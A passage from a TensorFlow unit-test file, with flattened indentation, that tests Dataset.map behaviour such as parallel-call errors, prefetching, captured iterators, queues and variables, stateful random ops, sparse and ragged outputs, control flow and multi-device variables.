np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._parallel_map_dataset_factory(components, apply_map, 1000,
100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapUnspecifiedOutputSize(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testParallelMapError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset,
lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testPrefetchError(self, apply_map):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(
dataset, lambda x: array_ops.check_numerics(x, "message")).prefetch(2)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureIterator(self, apply_map):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return apply_map(dataset_ops.Dataset.range(10), _map_fn)
def _build_graph():
if context.executing_eagerly():
captured_iterator = iter(dataset_ops.Dataset.range(10))
else:
captured_iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10))
ds = _build_ds(captured_iterator)
return captured_iterator, ds
captured_iter, ds = _build_graph()
if not context.executing_eagerly():
self.evaluate(captured_iter.initializer)
get_next = self.getNext(ds, requires_initialization=True)
for i in range(10):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureHashTable(self, apply_map):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
dataset = apply_map(input_sentences,
lambda x: string_ops.string_split([x]).values)
dataset = apply_map(dataset, table.lookup)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(table.initializer)
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureQueue(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: queue.dequeue())
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(enqueue_op)
self.evaluate(close_op)
for element in elements:
self.assertEqual(element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureSameResourceMultipleTimes(self, apply_map):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(-1)
dataset = apply_map(dataset, lambda _: (queue.dequeue(), queue_2.dequeue()))
self.evaluate(enqueue_op)
self.evaluate(close_op)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(100):
self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testSeededStatefulOperatorIsProperlyStateful(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).batch(2)
get_next = self.getNext(dataset, requires_initialization=True)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(self.evaluate(get_next()))
self.assertLen(random_values, 10)
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
get_next = self.getNext(dataset, requires_initialization=True)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(self.evaluate(get_next()))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
@combinations.generate(_test_combinations())
def testStatefulMapKeepsStateAcrossIterators(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
fn = lambda _: random_ops.random_uniform((), seed=11)
dataset = apply_map(dataset, fn).repeat(1000).batch(10)
get_next = self.getNext(dataset)
random_values = self.evaluate(get_next())
# Assert that one of the next 99 batches yielded by the iterator is
# different from the first.
i = 0
while i < 99:
if np.any(random_values != self.evaluate(get_next())):
break
i += 1
self.assertLess(i, 99)
@combinations.generate(_test_combinations())
def testStatefulOperationInShortCircuit(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
def increment_fn(x):
counter_var.assign_add(1)
return x
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, increment_fn)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations())
def testMapDict(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: {"foo": x * 2, "bar": x**2})
dataset = apply_map(dataset, lambda d: d["foo"] + d["bar"])
self.assertDatasetProduces(
dataset, expected_output=[i * 2 + i**2 for i in range(10)])
@combinations.generate(_test_combinations())
def testMapNamedtuple(self, apply_map):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(10)
images = apply_map(labels, lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = apply_map(dataset_tuple, example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = apply_map(dataset_tuple, preprocess_tuple)
dataset_namedtuple = apply_map(dataset_namedtuple, preprocess_namedtuple)
next_tuple = self.getNext(dataset_tuple)
next_namedtuple = self.getNext(dataset_namedtuple)
# make sure both datasets contain the same data
for i in range(10):
tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(next_namedtuple())
@combinations.generate(_test_combinations())
def testUseStepContainerInMap(self, apply_map):
row = np.arange(6)
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(dataset,
lambda elems: map_fn.map_fn(lambda x: x * x, elems))
self.assertDatasetProduces(dataset, expected_output=[row**2])
@combinations.generate(_test_combinations())
def testCaseAndCondInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensor_slices(row)
return apply_map(dataset, lambda x: control_map_fn(x, num))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
for i in range(6):
self.assertEqual(
(i // 2 if i % 2 else i * 2) if (num == 2 or num == 3) else i * 2,
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), divide),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensors(row)
return apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
row = np.arange(6)
for num in [2, 3, 4]:
get_next = self.getNext(build_dataset(row, num))
self.assertAllEqual(
[x // 2 if (num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaseAndCondInWhileInMap(self, apply_map):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = [
(math_ops.logical_or(math_ops.equal(y, 2),
math_ops.equal(y, 3)), defaults_two),
]
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
row = np.arange(6)
num = 2
dataset = dataset_ops.Dataset.from_tensors(row)
dataset = apply_map(
dataset,
lambda elems: map_fn.map_fn(lambda x: control_map_fn(x, num), elems))
get_next = self.getNext(dataset)
self.assertAllEqual([(x // 2 if x % 2 else x * 2) if
(num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testNestedListMapDataset(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([0, 1, 2]).repeat(10)
dataset = apply_map(dataset, lambda a: ([a[1], a[0] + a[2]], a[1]))
expected_output = [(np.array([1, 2]), 1)] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(buffer_size=[1, 2, 3, 4])))
def testPrefetch(self, apply_map, buffer_size):
# We will use this event to test that `_map_py_func()` has been invoked a
# certain number of times (6 times, to be exact) after consuming fewer
# elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
# We can indirectly observe that varying the buffer size has the intended
# effect by observing when `ev` is set (on the 6th invocation of
# `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least one element
# to start the prefetching.
dataset = dataset_ops.Dataset.range(100)
dataset = apply_map(dataset, _map_fn).prefetch(buffer_size)
get_next = self.getNext(dataset)
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, self.evaluate(get_next()))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testReturnList(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testMultiOutputPyFunc(self, apply_map):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _map_fn)
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparse(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
@combinations.generate(_test_combinations())
def testSparseChain(self, apply_map):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _sparse)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInference(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=True)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual((32, 3), dataset.element_spec.shape)
@combinations.generate(_test_combinations_with_mode("eager"))
def testSparseMapShapeInferencePartial(self, apply_map):
row_lengths = np.random.randint(0, 4, size=128)
values = np.ones(np.sum(row_lengths))
sparse = ragged_tensor.RaggedTensor.from_row_lengths(
values, row_lengths).to_sparse()
dataset = dataset_ops.Dataset.from_tensor_slices(sparse)
dataset = dataset.batch(32, drop_remainder=False)
dataset = apply_map(dataset, lambda x: x)
self.assertEqual([None, 3], dataset.element_spec.shape.as_list())
@combinations.generate(_test_combinations())
def testTensorArray(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
self.assertDatasetProduces(
dataset, expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testTensorArrayChain(self, apply_map):
def _tensor_array(i):
i = math_ops.cast(i, dtypes.int32)
return (
tensor_array_ops.TensorArray(dtypes.int32, element_shape=(), size=i)
.unstack(math_ops.range(i, dtype=dtypes.int32)))
def _check(x):
self.assertIsInstance(x, tensor_array_ops.TensorArray)
return x.identity()
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _tensor_array)
dataset = apply_map(dataset, _check)
self.assertDatasetProduces(
dataset,
expected_output=[list(range(i)) for i in range(10)])
@combinations.generate(_test_combinations())
def testRagged(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
dataset = dataset_ops.Dataset.range(5)
dataset = apply_map(dataset, _ragged)
self.assertDatasetProduces(
dataset,
expected_output=[ragged_factory_ops.constant([[i]]) for i in range(5)])
@combinations.generate(_test_combinations())
def testRaggedChain(self, apply_map):
def _ragged(i):
return ragged_tensor.RaggedTensor.from_tensor(i * [[1]])
def _concat(i):
self.assertTrue(ragged_tensor.is_ragged(i))
return ragged_concat_ops.concat([i, i], 0)
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, _ragged)
dataset = apply_map(dataset, _concat)
self.assertDatasetProduces(
dataset,
expected_output=[
self.evaluate(_concat(ragged_factory_ops.constant([[i]])))
for i in range(10)
])
# TODO(b/123904513)
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testParallelMapOutOfRangeError(self, apply_map):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
dataset = dataset_ops.Dataset.range(105)
dataset = apply_map(
dataset,
lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for i in range(100):
self.assertEqual(i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testConstantOutput(self, apply_map):
dataset = dataset_ops.Dataset.range(10)
dataset = apply_map(dataset, lambda x: [x, "hello", 10])
self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
@combinations.generate(_test_combinations())
def testWarnOnLookupTable(self, apply_map):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(["a"], [1.]), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
dataset = dataset_ops.Dataset.range(10)
_ = apply_map(dataset, collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating resources inside a function passed to Dataset.map() is "
"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
@combinations.generate(test_base.default_test_combinations())
def testWarnOnSeedFromOuterGraph(self):
with ops.Graph().as_default() as g:
g.seed = 10
warnings.simplefilter("always")
def _check_warning(caught_warnings, expected_result):
found_warning = False
for warning in caught_warnings:
if ("Explicitly set the seed in the function if this is not the "
"intended behavior" in str(warning)):
found_warning = True
break
self.assertEqual(found_warning, expected_result)
# map_fun doesn't use seed, so no warning is generated.
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(math_ops.square)
_check_warning(w, False)
def random_func(x):
x = math_ops.add(x, 1)
random_ops.random_shuffle([x, math_ops.square(x)])
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(random_func)
_check_warning(w, True)
def random_func_seeded(x):
ops.get_default_graph().seed = None
random_ops.random_shuffle(x)
return x
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(random_func_seeded)
_check_warning(w, False)
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).batch(2).map(
lambda x: random_ops.random_shuffle(x, seed=37))
_check_warning(w, False)
@combinations.generate(_test_combinations())
def testNestedDatasetMap(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
dataset = apply_map(dataset, dataset_ops.Dataset.from_tensor_slices)
dataset = apply_map(dataset, lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
@combinations.generate(_test_combinations())
def testReturnValueError(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\)"):
_ = apply_map(dataset, lambda x: Foo)
@combinations.generate(test_base.default_test_combinations())
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
self.assertDatasetProduces(
dataset, expected_error=(errors.InvalidArgumentError, "BrokenConst"))
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testNoInterOpParallelism(self, apply_map, num_parallel_calls):
dataset = dataset_ops.Dataset.from_tensors(0)
def _get_tid():
return np.int64(threading.current_thread().ident)
def _map_fn(_):
tids = []
for _ in range(10):
tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
return tids
dataset = apply_map(dataset, _map_fn)
dataset._variant_tensor.op._set_attr("use_inter_op_parallelism",
attr_value_pb2.AttrValue(b=False))
get_next = self.getNext(dataset)
tids = self.evaluate(get_next())
self.assertTrue(all(tids[0] == tid for tid in tids))
@combinations.generate(
combinations.times(_test_combinations(), _short_circuit_test_cases(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuit(self, apply_map, structure, fn, num_parallel_calls):
dataset = self.structuredDataset(structure).repeat()
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
if isinstance(structure, tuple):
expected = fn(*self.evaluate(self.structuredElement(structure)))
else:
expected = fn(self.evaluate(self.structuredElement(structure)))
self.assertEqual(expected, self.evaluate(get_next()))
@combinations.generate(
combinations.times(_test_combinations(),
combinations.combine(num_parallel_calls=[None, 12])))
def testShortCircuitCapturedInput(self, apply_map, num_parallel_calls):
captured_t = variables.Variable(42)
dataset = self.structuredDataset(None).repeat()
dataset = apply_map(
dataset, lambda x: captured_t, num_parallel_calls=num_parallel_calls)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
self.assertEqual(42, self.evaluate(get_next()))
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_elements=1, num_parallel_calls=1) +
combinations.combine(num_elements=10, num_parallel_calls=1) +
combinations.combine(num_elements=10, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=1) +
combinations.combine(num_elements=100, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=100)))
def testSloppyInterleaveInOrder(self, apply_map, num_elements,
num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
apply_map, num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(num_elements):
coordination_events[i].set()
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_elements=10, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=10) +
combinations.combine(num_elements=100, num_parallel_calls=100)))
def testSloppyInterleaveOutOfOrder(self, apply_map, num_elements,
num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
apply_map, num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
elements = [x for x in range(num_elements)]
for i in [1, 4, 7]:
elements[i], elements[i + 1] = elements[i + 1], elements[i]
for element in elements:
coordination_events[element].set()
self.assertEqual(element * element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(
combinations.combine(
tf_api_version=2,
mode=["eager", "graph"],
num_parallel_calls=[None, 12]))
def testPreserveCardinality(self, num_parallel_calls):
def py_fn(_):
raise StopIteration()
dataset = dataset_ops.Dataset.from_tensors(0).map(
lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
@combinations.generate(_test_combinations_with_mode("graph"))
def testCollectionCopy(self, apply_map):
w = variable_scope.get_variable("w", [])
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
def func(x):
self.assertIn(w, ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
return x
dataset = dataset_ops.Dataset.from_tensors(constant_op.constant(1.0))
_ = apply_map(dataset, func)
@combinations.generate(
combinations.times(
_test_combinations_with_mode_v1("graph"),
combinations.combine(num_parallel_calls=[None, 12])))
def testMapCancellation(self, apply_map, num_parallel_calls):
# Checks that a cancellation of is threaded through to map transformation.
queue = data_flow_ops.FIFOQueue(10, dtypes.int32, ())
def fn(_):
return queue.dequeue()
dataset = dataset_ops.Dataset.range(1)
dataset = apply_map(dataset, fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset, requires_initialization=True)
with self.cached_session() as sess:
thread = self.checkedThread(self.assert_op_cancelled, args=(get_next(),))
thread.start()
time.sleep(0.2)
sess.close()
thread.join()
# TODO(b/126553094): map doesnt work with variable defined inside function in
# eager mode, possible Graph tensors leak out of the function building context
# from function graph in eager mode as variables are created in init_scope.
@combinations.generate(test_base.graph_only_combinations())
def testCreateVariableInsideFunctionWithGetter(self):
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
return counter_var.assign_add(1)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
if hasattr(dataset, "map_with_legacy_function"):
# NOTE: In the legacy function, resource is captured by value.
with self.assertRaisesWithPredicateMatch(
AttributeError, "'Tensor' object has no attribute 'assign_add'"):
dataset.map_with_legacy_function(func)
dataset = dataset.map(func)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(10):
self.assertEqual(i + 1, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(_test_combinations())
def testCaptureVariable(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i + 1, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureUninitializedVariableError(self, apply_map):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
with self.assertRaises(errors.NotFoundError):
self.evaluate(get_next())
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testCaptureConstantsWithConflictingDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
with ops.device("/device:CPU:0"):
a = constant_op.constant(3.0)
with ops.device("/device:CPU:1"):
b = constant_op.constant(5.0)
def func(_):
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
expected_output = [8.0] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testReferenceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.VariableV1(3.0)
with ops.device("/device:CPU:1"):
b = variables.VariableV1(5.0)
return math_ops.add(a, b)
# NOTE: Use the legacy function implementation as eager function will
# convert RefVariables to ResourceVariables.
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [8.0] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
# TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@combinations.generate(_test_combinations_with_mode_v1("graph"))
def testResourceVariablesWithMultipleDevices(self, apply_map):
config = config_pb2.ConfigProto(device_count={"CPU": 3})
def func(_):
with variable_scope.variable_scope(
"variable", reuse=variable_scope.AUTO_REUSE):
with ops.device("/device:CPU:0"):
a_var = variable_scope.get_variable(
"a", (), dtypes.int32, use_resource=True)
a_var = math_ops.add(a_var, 1)
with ops.device("/device:CPU:1"):
b_var = variable_scope.get_variable(
"b", (), dtypes.int32, use_resource=True)
return math_ops.add(a_var, b_var)
g = ops.Graph()
with self.session(config=config, graph=g):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10)
dataset = apply_map(dataset, func)
self.evaluate(variables.global_variables_initializer())
expected_output = [1] * 10
